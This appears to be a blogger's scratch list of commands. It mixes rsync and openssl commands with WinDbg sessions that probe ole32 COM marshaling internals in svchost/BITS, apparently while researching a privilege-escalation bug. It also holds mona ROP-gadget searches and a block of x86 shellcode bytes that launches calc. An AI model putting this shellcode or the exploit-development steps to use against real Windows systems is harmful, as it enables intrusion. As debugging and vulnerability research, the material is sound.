F:\tool\dl\DeltaCopyRaw\rsync.exe -v -rlt -z --chmod=a=rw,Da+x -u --password-file=/cygdrive/ --delete "/cygdrive/F/test/" "root@192.168.0.100::wcb" <d:\rsyncd.passwd
rsync --daemon --config=/etc/rsyncd.conf
netstat -anpt | grep rsync
F:\tool\dl\DeltaCopyRaw\rsync.exe -v -rlt -z --chmod=a=rw,Da+x -u --progress --partial --bwlimit=1000 --delete "/cygdrive/D/MyRsync/" "root@192.168.0.100::wcb" <d:\rsyncd.passwd
rsync -v -rlt -z --progress --delete /mnt/HD/HD_a2/MyRsync/ cbwang505@192.168.0.9::wcb
rsync -v -rlt -z --progress --delete root@192.168.0.100::wcb /volume1/HKSync
{IID_IROTData}
IUnknownPtr cf = nullptr;
IBindCtx* bindCtx = NULL;
ULONG cchEaten;
CreateBindCtx(0, &bindCtx);
0xffe92680=>1d2680
HRESULT hr = _script_moniker->BindToObject(bindCtx, NULL, IID_IPersistStream, (void**)&cf);
ERROR_BAD_IMPERSONATION_LEVE SecurityIdentification SECURITY_IMPERSONATION_LEVEL
C:\\indows\System32\tidy.exe --doctype auto --output-html yes --clean yes --indent auto --show-warnings no --vertical-space no --tidy-mark no --wrap 0 --newline CRLF --output-bom yes --show-info yes --show-errors 0 --wrap-script-literals yes --quiet yes --force-output yes --mute-id yes --write-back yes %2
com:pipe,resets=0,reconnect,port=\\.\pipe\kd_server2008r2enterprise
!process 0 0 svchost.exe
.process /p /r ffffffa8032cf2b10
.reload /f /user ole32.dll
.reload /f /v ole32.dll lm vm ole32;
!process @$proc 0
ea0000
?@$proc
ole32base 000007fe`ff040000
000007fe`ff2122d0 =1d22d0
------------------------------------------------
right
.process /i /p fffffa8032b9d4f0; g
.reload /f /user ole32.dll;lm m ole32;
.process /r /p fffffa8032b9d4f0
--------------------------------------------
x63x61x63x6C,
2://.process /i; g
3://.process /r /p fffffa8032b92230
.process /p fffffa8032be2870
.process /i /p fffffa8032be2870
calc
.echo rax=>: ;dc @rax L10;.echo rbx=>:;dc @rbx L10;.echo rcx=>:;dc @rcx L10;.echo rdx=>:;dc @rdx L10;
dv /i /t /v
dt -b this
!address -summary
x combase!*
x ole32!*_SecretLock
x qmgr!CJobExternal*
dc ole32!*_SecretLock;
----------------------------------------------------------------
~*e .if ( poi(@$teb+0x1758) == 0) { .echo Unknown } .else { .if ( poi(poi(@$teb+0x1758)+c) & 80 ) { .echo STA } .else { .echo MTA } }
.load pykd !py mona rop -m mshtml.dll
!py mona rop -m *.dll -cp nonull
------------right--------------------------
!py mona rop -m *.dll
------------------------------
20180505
dt ntdll!_TEB @$teb ny *ole*
dt ntdll32!_PEB @$peb
x ole32!CExposedStream*
bp ole32!DfUnMarshalInterface
.reload /f /v ole32.dll ; lm vm ole32;
bu ole32!CoCreateObjectInContext;
.reload /f /v ole32.dll ; lm vm ole32;
x ole32!*CPIDTable*
dt ole32!CObjectContext 00000000`00277f90
first
000007fe`fdf00000 000007fe`fe0fc000 ole32
000007fe`fe0d0758
000007fe`fe0cf9c0 ole32!CPIDTable::s_PIDBuckets
next
000007fe`fdf00000 000007fe`fe0fc000 ole32
000007fe`fe0cf9c0 ole32!CPIDTable::s_PIDBuckets = struct SHashChain [23]
!list -t ole32!SHashChain.pNext -x "dt ole32!SHashChain poi(@$extret)" 000007fe`fdfbf9c8
!list -t ole32!SHashChain.pPrev -x "dt ole32!SHashChain poi(@$extret)" 000007fe`fdfbf9c8
!list -t ole32!SHashChain -l pNext 000007fe`fdfbf9c8
bits
first
000007fe`fdf00000 000007fe`fe0fc000 ole32
000007fe`fe0cf9c0
next
000007fe`ff2c0000 000007fe`ff4bc000 ole32
000007fe`ff48f9c0 ole32!CPIDTable::s_PIDBuckets = struct SHashChain [23]
ole32!CPIDTable::s_PIDBuckets偏移量?1CF9C0?固定
dps 000007fe`fdfbfa28;
dps 00000000`0029fcb0;
r @$t1 = 20; r @$t0 =000007fe`fdfbfa28;
r @$t1 = 20; r @$t0 =ole32!CPIDTable::s_PIDBuckets;
dps poi( poi(@$t0+0x008)+030h) L5;r @$t1 = @$t1-1; dt ole32!shashchain @$t0; r @$t0 = poi(@$t0+0x008)+0x008; z( @$t1);dt ole32!shashchain @$t0;
r @$t1 = 20; r @$t0 =ole32!CPIDTable::s_PIDBuckets;
dps @$t0 L5;r @$t1 = @$t1-1; dt ole32!shashchain @$t0; r @$t0 = poi(@$t0+0x008)+0x008; z( @$t1);dt ole32!shashchain @$t0;
dps 00000000`00357f90
bp ole32!CExposedStream::Unmarshal
bp ole32!GenericStream::Read
dt _GUID @rsp+38h
dt _GUID @rbx
dt-b tagOBJREF
ole32!CBasedILockBytesPtrPtr::CBasedILockBytesPtrPtr
bp ole32!GenericStream::Read
----------------------------------------------------------------
eb ole32!CFreeMarshaler::_fSecretInit 01;
ed ole32!CFreeMarshaler::_SecretBlock 676e6177 6c656263 73676e69 7374666f;
dc ole32!CFreeMarshaler::_SecretBlock L10;
dc ole32!CFreeMarshaler::_fSecretInit L10;
dc @rsp+28h=>rcx
x ole32!CFreeMarshaler::*
x ole32!*Secret*
bp /p fffffa8032be5060 kernel32!createfilew
bp /p fffffa8032be5060 ole32!CFreeMarshaler::InitSecret
bp /p @$proc ole32!CFreeMarshaler::UnmarshalInterface ".printf \"InItStatus:=>%d, Secret:is=>%d\", ole32!CFreeMarshaler::_fSecretInit , ole32!CFreeMarshaler::_SecretBlock;dc ole32!CFreeMarshaler::_fSecretInit ; dc ole32!CFreeMarshaler::_SecretBlock; "
bp /p @$proc ole32!CStdMarshal::UnmarshalObjRef ".printf \"rbx:is=>%d\", @rbx;"
bp /p ffffffa8032cf2b10 ole32!LoadTypeLibEx
bp /p fffffa8032be2870 qmgr!CJobExternal::SetNotifyInterfaceInternal
bp /p fffffa8032be2870 ole32!CFreeMarshaler::GetUnmarshalClass
bp /p fffffa8032be2870 ole32!CStdMarshal::Finish_RemQIAndUnmarshal2
ole32!CProcessSecret::GetProcessSecret
dc ole32!CFreeMarshaler::_SecretBlock
bp mydriver!myFunction ".if (@eax & 0x0`ffffffff) = 0x0`c0004321 {} .else {gc}"
cd G:\重要文件\nas
G:\重要文件\nas\openssl\bin\openssl.exe pkcs12 -export -out server.pfx -inkey server.key -in nas.jzrj.club_ssl.crt
\x31\xdb\x64\x8b\x7b\x30\x8b\x7f
x0c\x8b\x7f\x1c\x8b\x47\x08\x8b
x77\x20\x8b\x3f\x80\x7e\x0c\x33
x75\xf2\x89\xc7\x03\x78\x3c\x8b
x57\x78\x01\xc2\x8b\x7a\x20\x01
xc7\x89\xdd\x8b\x34\xaf\x01\xc6
x45\x81\x3e\x43\x72\x65\x61\x75
xf2\x81\x7e\x08\x6f\x63\x65\x73
x75\xe9\x8b\x7a\x24\x01\xc7\x66
x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7
x8b\x7c\xaf\xfc\x01\xc7\x89\xd9
xb1\xff\x53\xe2\xfd\x68\x63\x61
x6c\x63\x89\xe2\x52\x52\x53\x53
x53\x53\x53\x53\x52\x53\xff\xd7
x ole32!CoMarshalInterface
sxe ld:ole32
!process 0 0 MyComEop.exe
right
.process /i /p fffffa8034270770; g
.reload /f /user ole32.dll;lm m ole32;
.process /r /p fffffa8034270770
NdrGetUserMarshalInfo
lm vm ole32;!teb;
725413A8 LoadLibraryExW API-MS-Win-Core-LibraryLoader-L1-1-0
windbg常用命令
最新推荐文章于 2022-03-10 17:56:11 发布